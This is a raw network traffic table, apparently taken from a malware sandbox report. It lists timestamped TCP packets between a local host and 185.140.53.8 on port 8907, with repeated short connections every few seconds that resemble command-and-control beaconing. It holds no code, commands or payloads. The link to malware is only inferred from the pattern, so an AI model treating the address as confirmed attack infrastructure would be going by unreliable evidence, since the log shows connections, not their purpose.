Sep 15, 2021 06:14:25.453900099 CEST	8907	49779	185.140.53.8	192.168.2.3
Sep 15, 2021 06:14:25.454013109 CEST	49779	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:14:25.454258919 CEST	8907	49779	185.140.53.8	192.168.2.3
Sep 15, 2021 06:14:25.454278946 CEST	8907	49779	185.140.53.8	192.168.2.3
Sep 15, 2021 06:14:25.454377890 CEST	49779	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:14:25.454953909 CEST	8907	49779	185.140.53.8	192.168.2.3
Sep 15, 2021 06:14:25.455059052 CEST	49779	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:14:25.457844973 CEST	8907	49779	185.140.53.8	192.168.2.3
Sep 15, 2021 06:14:25.458035946 CEST	49779	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:14:29.526012897 CEST	49786	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:14:29.701529026 CEST	8907	49786	185.140.53.8	192.168.2.3
Sep 15, 2021 06:14:29.701809883 CEST	49786	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:14:29.704539061 CEST	49786	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:14:30.040234089 CEST	8907	49786	185.140.53.8	192.168.2.3
Sep 15, 2021 06:14:30.040371895 CEST	49786	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:14:30.449192047 CEST	8907	49786	185.140.53.8	192.168.2.3
Sep 15, 2021 06:14:30.449327946 CEST	49786	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:14:30.626317024 CEST	8907	49786	185.140.53.8	192.168.2.3
Sep 15, 2021 06:14:30.626461983 CEST	49786	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:14:30.999190092 CEST	8907	49786	185.140.53.8	192.168.2.3
Sep 15, 2021 06:14:30.999288082 CEST	49786	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:14:31.275358915 CEST	8907	49786	185.140.53.8	192.168.2.3
Sep 15, 2021 06:14:31.275573015 CEST	49786	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:14:31.280364990 CEST	8907	49786	185.140.53.8	192.168.2.3
Sep 15, 2021 06:14:31.280517101 CEST	49786	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:14:31.463551044 CEST	8907	49786	185.140.53.8	192.168.2.3
Sep 15, 2021 06:14:31.464272022 CEST	8907	49786	185.140.53.8	192.168.2.3
Sep 15, 2021 06:14:31.464315891 CEST	8907	49786	185.140.53.8	192.168.2.3
Sep 15, 2021 06:14:31.464438915 CEST	49786	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:14:31.473586082 CEST	8907	49786	185.140.53.8	192.168.2.3
Sep 15, 2021 06:14:31.473700047 CEST	49786	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:14:31.500202894 CEST	49786	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:14:31.660967112 CEST	8907	49786	185.140.53.8	192.168.2.3
Sep 15, 2021 06:14:31.661001921 CEST	8907	49786	185.140.53.8	192.168.2.3
Sep 15, 2021 06:14:31.661022902 CEST	8907	49786	185.140.53.8	192.168.2.3
Sep 15, 2021 06:14:31.661042929 CEST	8907	49786	185.140.53.8	192.168.2.3
Sep 15, 2021 06:14:31.661127090 CEST	49786	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:14:31.661128998 CEST	8907	49786	185.140.53.8	192.168.2.3
Sep 15, 2021 06:14:31.661153078 CEST	49786	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:14:31.661170006 CEST	49786	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:14:31.661171913 CEST	8907	49786	185.140.53.8	192.168.2.3
Sep 15, 2021 06:14:31.661206961 CEST	8907	49786	185.140.53.8	192.168.2.3
Sep 15, 2021 06:14:31.661211967 CEST	49786	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:14:31.661731958 CEST	8907	49786	185.140.53.8	192.168.2.3
Sep 15, 2021 06:14:31.661858082 CEST	49786	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:14:35.519099951 CEST	49787	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:14:35.710130930 CEST	8907	49787	185.140.53.8	192.168.2.3
Sep 15, 2021 06:14:35.710306883 CEST	49787	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:14:35.710880995 CEST	49787	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:14:36.021064997 CEST	8907	49787	185.140.53.8	192.168.2.3
Sep 15, 2021 06:14:36.021269083 CEST	49787	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:14:36.427006006 CEST	8907	49787	185.140.53.8	192.168.2.3
Sep 15, 2021 06:14:36.427124977 CEST	49787	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:14:36.626739979 CEST	8907	49787	185.140.53.8	192.168.2.3
Sep 15, 2021 06:14:36.626858950 CEST	49787	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:14:37.007371902 CEST	8907	49787	185.140.53.8	192.168.2.3
Sep 15, 2021 06:14:37.007685900 CEST	49787	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:14:37.312824965 CEST	8907	49787	185.140.53.8	192.168.2.3
Sep 15, 2021 06:14:37.313098907 CEST	49787	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:14:37.313345909 CEST	8907	49787	185.140.53.8	192.168.2.3
Sep 15, 2021 06:14:37.313458920 CEST	49787	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:14:37.511408091 CEST	8907	49787	185.140.53.8	192.168.2.3
Sep 15, 2021 06:14:37.511461973 CEST	8907	49787	185.140.53.8	192.168.2.3
Sep 15, 2021 06:14:37.511648893 CEST	49787	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:14:37.512096882 CEST	8907	49787	185.140.53.8	192.168.2.3
Sep 15, 2021 06:14:37.512181044 CEST	8907	49787	185.140.53.8	192.168.2.3
Sep 15, 2021 06:14:37.512248993 CEST	49787	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:14:37.512348890 CEST	49787	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:14:37.578623056 CEST	49787	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:14:37.719455957 CEST	8907	49787	185.140.53.8	192.168.2.3
Sep 15, 2021 06:14:37.719479084 CEST	8907	49787	185.140.53.8	192.168.2.3
Sep 15, 2021 06:14:37.719562054 CEST	49787	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:14:37.720134020 CEST	8907	49787	185.140.53.8	192.168.2.3
Sep 15, 2021 06:14:37.721148968 CEST	8907	49787	185.140.53.8	192.168.2.3
Sep 15, 2021 06:14:37.721152067 CEST	49787	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:14:37.721168995 CEST	8907	49787	185.140.53.8	192.168.2.3
Sep 15, 2021 06:14:37.721211910 CEST	49787	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:14:37.722096920 CEST	8907	49787	185.140.53.8	192.168.2.3
Sep 15, 2021 06:14:37.722126961 CEST	8907	49787	185.140.53.8	192.168.2.3
Sep 15, 2021 06:14:37.722212076 CEST	49787	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:14:37.731209993 CEST	8907	49787	185.140.53.8	192.168.2.3
Sep 15, 2021 06:14:37.731345892 CEST	49787	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:14:41.597362995 CEST	49788	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:14:41.779311895 CEST	8907	49788	185.140.53.8	192.168.2.3
Sep 15, 2021 06:14:41.779563904 CEST	49788	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:14:41.780947924 CEST	49788	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:14:42.098212957 CEST	8907	49788	185.140.53.8	192.168.2.3
Sep 15, 2021 06:14:42.098301888 CEST	49788	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:14:42.507030964 CEST	8907	49788	185.140.53.8	192.168.2.3
Sep 15, 2021 06:14:42.507725000 CEST	49788	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:14:43.047416925 CEST	49788	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:14:43.259272099 CEST	8907	49788	185.140.53.8	192.168.2.3
Sep 15, 2021 06:14:43.594949961 CEST	49788	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:14:43.772119045 CEST	8907	49788	185.140.53.8	192.168.2.3
Sep 15, 2021 06:14:43.772356987 CEST	49788	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:14:47.934298992 CEST	49789	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:14:48.140211105 CEST	8907	49789	185.140.53.8	192.168.2.3
Sep 15, 2021 06:14:48.140422106 CEST	49789	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:14:48.141045094 CEST	49789	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:14:48.487091064 CEST	8907	49789	185.140.53.8	192.168.2.3
Sep 15, 2021 06:14:48.487292051 CEST	49789	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:14:48.874840975 CEST	8907	49789	185.140.53.8	192.168.2.3
Sep 15, 2021 06:14:48.875011921 CEST	49789	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:14:49.060200930 CEST	8907	49789	185.140.53.8	192.168.2.3
Sep 15, 2021 06:14:49.060321093 CEST	49789	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:14:49.446940899 CEST	8907	49789	185.140.53.8	192.168.2.3
Sep 15, 2021 06:14:49.447171926 CEST	49789	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:14:49.755361080 CEST	8907	49789	185.140.53.8	192.168.2.3
Sep 15, 2021 06:14:49.755497932 CEST	49789	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:14:49.764285088 CEST	8907	49789	185.140.53.8	192.168.2.3
Sep 15, 2021 06:14:49.764480114 CEST	49789	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:14:49.939565897 CEST	49789	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:14:49.939796925 CEST	8907	49789	185.140.53.8	192.168.2.3
Sep 15, 2021 06:14:49.939953089 CEST	49789	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:14:49.940203905 CEST	8907	49789	185.140.53.8	192.168.2.3
Sep 15, 2021 06:14:49.940301895 CEST	49789	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:14:49.953350067 CEST	8907	49789	185.140.53.8	192.168.2.3
Sep 15, 2021 06:14:49.953418016 CEST	8907	49789	185.140.53.8	192.168.2.3
Sep 15, 2021 06:14:49.953684092 CEST	49789	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:14:53.955535889 CEST	49790	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:14:54.127978086 CEST	8907	49790	185.140.53.8	192.168.2.3
Sep 15, 2021 06:14:54.128099918 CEST	49790	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:14:54.128707886 CEST	49790	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:14:54.447159052 CEST	8907	49790	185.140.53.8	192.168.2.3
Sep 15, 2021 06:14:54.447338104 CEST	49790	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:14:54.816191912 CEST	8907	49790	185.140.53.8	192.168.2.3
Sep 15, 2021 06:14:54.816442966 CEST	49790	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:14:55.003382921 CEST	8907	49790	185.140.53.8	192.168.2.3
Sep 15, 2021 06:14:55.006740093 CEST	49790	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:14:55.387398005 CEST	8907	49790	185.140.53.8	192.168.2.3
Sep 15, 2021 06:14:55.390760899 CEST	49790	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:14:55.662430048 CEST	8907	49790	185.140.53.8	192.168.2.3
Sep 15, 2021 06:14:55.662568092 CEST	49790	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:14:55.670255899 CEST	8907	49790	185.140.53.8	192.168.2.3
Sep 15, 2021 06:14:55.670371056 CEST	49790	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:14:55.846457958 CEST	8907	49790	185.140.53.8	192.168.2.3
Sep 15, 2021 06:14:55.846517086 CEST	8907	49790	185.140.53.8	192.168.2.3
Sep 15, 2021 06:14:55.846616030 CEST	49790	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:14:55.846652031 CEST	49790	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:14:55.847198009 CEST	8907	49790	185.140.53.8	192.168.2.3
Sep 15, 2021 06:14:55.847278118 CEST	49790	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:14:55.849195957 CEST	8907	49790	185.140.53.8	192.168.2.3
Sep 15, 2021 06:14:55.849277973 CEST	49790	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:14:55.892369032 CEST	49790	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:14:56.021594048 CEST	8907	49790	185.140.53.8	192.168.2.3
Sep 15, 2021 06:14:56.021761894 CEST	49790	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:14:56.022304058 CEST	8907	49790	185.140.53.8	192.168.2.3
Sep 15, 2021 06:14:56.022380114 CEST	49790	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:14:56.029304981 CEST	8907	49790	185.140.53.8	192.168.2.3
Sep 15, 2021 06:14:56.029380083 CEST	49790	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:14:56.052696943 CEST	8907	49790	185.140.53.8	192.168.2.3
Sep 15, 2021 06:14:56.052798033 CEST	49790	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:14:56.053239107 CEST	8907	49790	185.140.53.8	192.168.2.3
Sep 15, 2021 06:14:56.053278923 CEST	8907	49790	185.140.53.8	192.168.2.3
Sep 15, 2021 06:14:56.053308964 CEST	49790	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:14:56.053328037 CEST	49790	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:14:56.054336071 CEST	8907	49790	185.140.53.8	192.168.2.3
Sep 15, 2021 06:14:56.054375887 CEST	8907	49790	185.140.53.8	192.168.2.3
Sep 15, 2021 06:14:56.054411888 CEST	49790	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:14:56.054434061 CEST	49790	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:14:56.205034971 CEST	49684	80	192.168.2.3	93.184.220.29
Sep 15, 2021 06:14:56.205200911 CEST	49685	443	192.168.2.3	40.126.31.139
Sep 15, 2021 06:14:56.205233097 CEST	49682	443	192.168.2.3	40.126.31.139
Sep 15, 2021 06:14:56.222244978 CEST	80	49684	93.184.220.29	192.168.2.3
Sep 15, 2021 06:14:56.222369909 CEST	49684	80	192.168.2.3	93.184.220.29
Sep 15, 2021 06:14:56.247736931 CEST	443	49682	40.126.31.139	192.168.2.3
Sep 15, 2021 06:14:56.247847080 CEST	49682	443	192.168.2.3	40.126.31.139
Sep 15, 2021 06:14:56.247956038 CEST	443	49685	40.126.31.139	192.168.2.3
Sep 15, 2021 06:14:56.248106003 CEST	49685	443	192.168.2.3	40.126.31.139
Sep 15, 2021 06:14:59.627124071 CEST	49692	443	192.168.2.3	20.190.160.134
Sep 15, 2021 06:14:59.653784990 CEST	443	49692	20.190.160.134	192.168.2.3
Sep 15, 2021 06:14:59.653911114 CEST	49692	443	192.168.2.3	20.190.160.134
Sep 15, 2021 06:14:59.910175085 CEST	49795	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:00.099029064 CEST	8907	49795	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:00.099287987 CEST	49795	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:00.100074053 CEST	49795	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:00.424079895 CEST	8907	49795	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:00.424335003 CEST	49795	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:00.799622059 CEST	8907	49795	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:00.799689054 CEST	49795	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:00.982187986 CEST	8907	49795	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:00.983242989 CEST	49795	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:01.378163099 CEST	8907	49795	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:01.378345966 CEST	49795	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:01.650301933 CEST	8907	49795	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:01.650599957 CEST	49795	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:01.651237011 CEST	8907	49795	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:01.651351929 CEST	49795	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:01.837806940 CEST	8907	49795	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:01.838015079 CEST	49795	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:01.838105917 CEST	8907	49795	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:01.838166952 CEST	8907	49795	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:01.838217020 CEST	49795	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:01.838294029 CEST	49795	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:01.844291925 CEST	8907	49795	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:01.844464064 CEST	49795	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:01.893222094 CEST	49795	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:02.033412933 CEST	8907	49795	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:02.033480883 CEST	8907	49795	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:02.033557892 CEST	49795	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:02.033616066 CEST	49795	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:02.034234047 CEST	8907	49795	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:02.034301043 CEST	8907	49795	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:02.034333944 CEST	49795	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:02.034392118 CEST	49795	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:02.035170078 CEST	8907	49795	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:02.035232067 CEST	8907	49795	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:02.035259008 CEST	49795	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:02.035285950 CEST	8907	49795	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:02.035310984 CEST	49795	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:02.035378933 CEST	49795	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:02.042260885 CEST	8907	49795	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:02.042437077 CEST	49795	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:05.910511971 CEST	49796	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:06.099196911 CEST	8907	49796	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:06.099673033 CEST	49796	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:06.102195024 CEST	49796	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:06.413093090 CEST	8907	49796	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:06.413319111 CEST	49796	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:06.827230930 CEST	8907	49796	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:06.827709913 CEST	49796	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:07.004110098 CEST	8907	49796	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:07.004371881 CEST	49796	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:07.381618977 CEST	8907	49796	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:07.381896019 CEST	49796	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:07.659334898 CEST	8907	49796	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:07.659643888 CEST	49796	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:07.663309097 CEST	8907	49796	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:07.663535118 CEST	49796	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:07.844283104 CEST	8907	49796	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:07.844424009 CEST	49796	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:07.853214025 CEST	8907	49796	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:07.853260994 CEST	8907	49796	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:07.853291988 CEST	49796	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:07.853341103 CEST	49796	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:07.854124069 CEST	8907	49796	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:07.854197979 CEST	49796	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:07.893703938 CEST	49796	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:08.028240919 CEST	8907	49796	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:08.028351068 CEST	8907	49796	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:08.028417110 CEST	49796	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:08.028471947 CEST	49796	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:08.042117119 CEST	8907	49796	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:08.042174101 CEST	8907	49796	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:08.042267084 CEST	49796	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:08.042321920 CEST	49796	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:08.043088913 CEST	8907	49796	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:08.043193102 CEST	49796	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:08.043265104 CEST	8907	49796	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:08.043338060 CEST	49796	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:08.043349028 CEST	8907	49796	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:08.043412924 CEST	8907	49796	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:08.043421030 CEST	49796	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:08.043478012 CEST	49796	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:09.407742977 CEST	80	49688	93.184.220.29	192.168.2.3
Sep 15, 2021 06:15:09.408045053 CEST	49688	80	192.168.2.3	93.184.220.29
Sep 15, 2021 06:15:11.911910057 CEST	49797	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:12.098026991 CEST	8907	49797	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:12.098195076 CEST	49797	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:12.099261045 CEST	49797	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:12.402193069 CEST	8907	49797	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:12.402436972 CEST	49797	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:12.787296057 CEST	8907	49797	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:12.787511110 CEST	49797	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:12.973130941 CEST	8907	49797	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:12.973393917 CEST	49797	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:13.362247944 CEST	8907	49797	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:13.362459898 CEST	49797	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:13.638222933 CEST	8907	49797	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:13.638349056 CEST	49797	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:13.642791033 CEST	8907	49797	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:13.643002987 CEST	49797	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:13.824795961 CEST	8907	49797	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:13.824894905 CEST	49797	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:13.826047897 CEST	8907	49797	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:13.826112986 CEST	49797	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:13.836793900 CEST	8907	49797	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:13.836844921 CEST	8907	49797	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:13.836872101 CEST	49797	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:13.836896896 CEST	49797	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:13.956525087 CEST	49797	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:14.023030043 CEST	8907	49797	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:14.023072004 CEST	8907	49797	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:14.023097038 CEST	8907	49797	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:14.023140907 CEST	8907	49797	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:14.023128033 CEST	49797	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:14.023165941 CEST	8907	49797	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:14.023190975 CEST	8907	49797	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:14.023202896 CEST	49797	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:14.023211002 CEST	49797	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:14.023236036 CEST	49797	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:14.024216890 CEST	8907	49797	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:14.024251938 CEST	8907	49797	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:14.024332047 CEST	49797	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:14.024355888 CEST	49797	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:17.975111008 CEST	49798	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:18.178977966 CEST	8907	49798	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:18.179239035 CEST	49798	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:18.180591106 CEST	49798	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:18.467015028 CEST	8907	49798	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:18.467406988 CEST	49798	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:18.838989973 CEST	8907	49798	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:18.839198112 CEST	49798	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:19.015283108 CEST	8907	49798	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:19.015460014 CEST	49798	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:19.395154953 CEST	8907	49798	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:19.395596981 CEST	49798	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:19.697309017 CEST	8907	49798	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:19.699875116 CEST	49798	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:19.700999975 CEST	8907	49798	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:19.701246023 CEST	49798	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:19.942694902 CEST	49798	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:20.083154917 CEST	8907	49798	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:20.083405018 CEST	49798	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:20.116894960 CEST	8907	49798	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:20.117079973 CEST	49798	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:21.750368118 CEST	80	49688	93.184.220.29	192.168.2.3
Sep 15, 2021 06:15:21.750534058 CEST	49688	80	192.168.2.3	93.184.220.29
Sep 15, 2021 06:15:22.828107119 CEST	443	49686	204.79.197.200	192.168.2.3
Sep 15, 2021 06:15:23.958925962 CEST	49799	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:24.132989883 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:24.133588076 CEST	49799	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:24.133636951 CEST	49799	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:24.306055069 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:24.347908020 CEST	49799	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:24.525093079 CEST	8907	49799	185.140.53.8	192.168.2.3
